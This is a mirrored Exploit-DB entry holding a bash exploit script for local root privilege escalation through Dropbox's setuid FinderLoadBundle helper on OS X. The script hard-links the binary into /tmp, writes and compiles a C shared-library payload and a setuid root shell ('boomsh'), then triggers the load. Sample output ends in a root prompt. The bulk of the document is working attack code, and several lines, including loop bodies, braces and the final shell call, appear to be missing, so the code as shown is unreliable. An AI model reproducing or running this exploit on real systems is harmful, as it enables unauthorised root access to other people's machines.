Dropbox < 3.3.x - OSX FinderLoadBundle Privilege Escalation

  • 作者: cenobyte
    日期: 2015-09-30
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/38360/
  • #!/bin/bash
    # Exploit Title: Dropbox FinderLoadBundle OS X local root exploit
    # Google Dork: N/A
    # Date: 29/09/15
    # Exploit Author: cenobyte
    # Vendor Homepage: https://www.dropbox.com
    # Software Link: N/A
    # Version: Dropbox 1.5.6, 1.6-7.*, 2.1-11.*, 3.0.*, 3.1.*, 3.3.*
    # Tested on: OS X Yosemite (10.10.5)
    # CVE: N/A
    #Dropbox FinderLoadBundle OS X local root exploit by cenobyte 2015
    # - vulnerability description:
    # The setuid root FinderLoadBundle that was included in older DropboxHelperTools
    # versions for OS X allows loading of dynamically linked shared libraries
    # that are residing in the same directory. The directory in which
    # FinderLoadBundle is located is owned by root and that prevents placing
    # arbitrary files there. But creating a hard link from FinderLoadBundle to
    # somewhere in a directory in /tmp circumvents that protection thus making it
    # possible to load a shared library containing a payload which creates a root
    # shell.
    # - vulnerable versions: | versions not vulnerable:
    # Dropbox 3.3.* for Mac| Dropbox 3.10.* for Mac
    # Dropbox 3.1.* for Mac| Dropbox 3.9.* for Mac
    # Dropbox 3.0.* for Mac| Dropbox 3.8.* for Mac
    # Dropbox 2.11.* for Mac | Dropbox 3.7.* for Mac
    # Dropbox 2.10.* for Mac | Dropbox 3.6.* for Mac
    # Dropbox 2.9.* for Mac| Dropbox 3.5.* for Mac
    # Dropbox 2.8.* for Mac| Dropbox 3.4.* for Mac
    # Dropbox 2.7.* for Mac| Dropbox 3.2.* for Mac
    # Dropbox 2.6.* for Mac| Dropbox 1.5.1-5 for Mac
    # Dropbox 2.5.* for Mac| Dropbox 1.4.* for Mac
    # Dropbox 2.4.* for Mac| Dropbox 1.3.* for Mac
    # Dropbox 2.3.* for Mac|
    # Dropbox 2.2.* for Mac|
    # Dropbox 2.1.* for Mac|
    # Dropbox 1.7.* for Mac|
    # Dropbox 1.6.* for Mac|
    # Dropbox 1.5.6 for Mac|
    # The vulnerability was fixed in newer DropboxHelperTools versions as of 3.4.*.
    # However, there is no mention of this issue at the Dropbox release notes:
    # https://www.dropbox.com/release_notes
    # It seems that one of the fixes implemented in FinderLoadBundle is a
    # check whether the path of the bundle is a root owned directory making it
    # impossible to load arbitrary shared libraries as a non-privileged user.
    # I am not sure how to find the exact version of the FinderLoadBundle executable
    # but the included Info.plist contained the following key:
    # <key>CFBundleShortVersionString</key>
    # This key is no longer present in the plist file of the latest version. So I
    # included a basic vulnerable version checker that checks for the presence of
    # this key.
    # - exploit details:
    # I wrote this on OS X Yosemite (10.10.5) but there are no OS specific features
    # used. This exploit relies on Xcode for the shared library + root shell to be
    # compiled. After successful exploitation a root shell is left in a directory in
    # /tmp so make sure you delete it on your own system when you are done testing. 
    # - example:
    # $ ./dropboxfinderloadbundle.sh 
    # Dropbox FinderLoadBundle OS X local root exploit by cenobyte 2015
    # [-] creating temporary directory: /tmp/c7a15893fc1b28d31071c16c6663cbf3
    # [-] linking /Library/DropboxHelperTools/Dropbox_u501/FinderLoadBundle
    # [-] constructing bundle
    # [-] creating /tmp/c7a15893fc1b28d31071c16c6663cbf3/boomsh.c
    # [-] compiling root shell
    # [-] executing FinderLoadBundle using root shell payload
    # [-] entering root shell
    # bash-3.2# id -P
    # root:********:0:0::0:0:System Administrator:/var/root:/bin/sh
    readonly __progname=$(basename $0)
    errx() {
    	echo "$__progname: $@" >&2
    	exit 1
    main() {
    	local -r tmp=$(head -10 /dev/urandom | md5)
    	local -r helpertools="/Library/DropboxHelperTools"
    	local -r bundle="/tmp/$tmp/mach_inject_bundle_stub.bundle/Contents/MacOS"
    	local -r bundletarget="$bundle/mach_inject_bundle_stub"
    	local -r bundlesrc="${bundletarget}.c"
    	local -r sh="/tmp/$tmp/boomsh"
    	local -r shsrc="${sh}.c"
    	local -r cfversion="CFBundleShortVersionString"
    	local -r findbin="FinderLoadBundle"
    	echo "Dropbox $findbin OS X local root exploit by cenobyte 2015"
    	uname -v | grep -q ^Darwin || \
    		errx "this Dropbox exploit only works on OS X"
    	[ ! -d "$helpertools" ] && \
    		errx "$helpertools does not exist"
    	which -s gcc || \
    		errx "gcc not found"
    	for finder in $(ls $helpertools/Dropbox_u*/$findbin); do
    		stat -s "$finder" | grep -q "st_mode=0104"
    		if [ $? -eq 0 ]; then
    	[ $found -ne 1 ] && \
    		errx "couldn't find a setuid root $findbin"
    	local -r finderdir=$(dirname $finder)
    	local -r plist="${finderdir}/DropboxBundle.bundle/Contents/Info.plist"
    	[ -f "$plist" ] || \
    		errx "FinderLoadBundle not vulnerable (cannot open $plist)"
    	grep -q "<key>$cfversion</key>" "$plist" || \
    		errx "FinderLoadBundle not vulnerable (plist missing $cfversion)"
    	echo "[-] creating temporary directory: /tmp/$tmp"
    	mkdir /tmp/$tmp || \
    		errx "couldn't create /tmp/$tmp"
    	echo "[-] linking $finder"
    	ln "$finder" "/tmp/$tmp/$findbin" || \
    		errx "ln $finder /tmp/$tmp/$findbin failed"
    	echo "[-] constructing bundle"
    	mkdir -p "$bundle" || \
    		errx "cannot create $bundle"
    	echo "#include <sys/stat.h>" > "$bundlesrc"
    	echo "#include <sys/types.h>" >> "$bundlesrc"
    	echo "#include <stdlib.h>" >> "$bundlesrc"
    	echo "#include <unistd.h>" >> "$bundlesrc"
    	echo "extern void init(void) __attribute__ ((constructor));" >> "$bundlesrc"
    	echo "void init(void)" >> "$bundlesrc"
    	echo "{" >> "$bundlesrc"
    	echo "	setuid(0);" >> "$bundlesrc"
    	echo "	setgid(0);" >> "$bundlesrc"
    	echo "	chown(\"$sh\", 0, 0);" >> "$bundlesrc"
    	echo "	chmod(\"$sh\", S_ISUID|S_IRWXU|S_IXGRP|S_IXOTH);" >> "$bundlesrc"
    	echo "}" >> "$bundlesrc"
    	echo "[-] creating $shsrc"
    	echo "#include <unistd.h>" > "$shsrc"
    	echo "#include <stdio.h>" >> "$shsrc"
    	echo "#include <stdlib.h>" >> "$shsrc"
    	echo "int" >> "$shsrc"
    	echo "main()" >> "$shsrc"
    	echo "{" >> "$shsrc"
    	echo "	setuid(0);" >> "$shsrc"
    	echo "	setgid(0);" >> "$shsrc"
    	echo "	system(\"/bin/bash\");" >> "$shsrc"
    	echo "	return(0);" >> "$shsrc"
    	echo "}" >> "$shsrc"
    	echo "[-] compiling root shell"
    	gcc "$shsrc" -o "$sh" || \
    	errx "gcc failed for $shsrc"
    	gcc -dynamiclib -o "$bundletarget" "$bundlesrc" || \
    		errx "gcc failed for $bundlesrc"
    	echo "[-] executing $findbin using root shell payload"
    	cd "/tmp/$tmp"
    	./$findbin mach_inject_bundle_stub.bundle 2>/dev/null 1>/dev/null
    	[ $? -ne 4 ] && \
    		errx "exploit failed, $findbin seems not vulnerable"
    	[ ! -f "$sh" ] && \
    		errx "$sh was not created, exploit failed"
    	stat -s "$sh" | grep -q "st_mode=0104" || \
    		errx "$sh was not set to setuid root, exploit failed"
    	echo "[-] entering root shell"
    main "$@"
    exit 0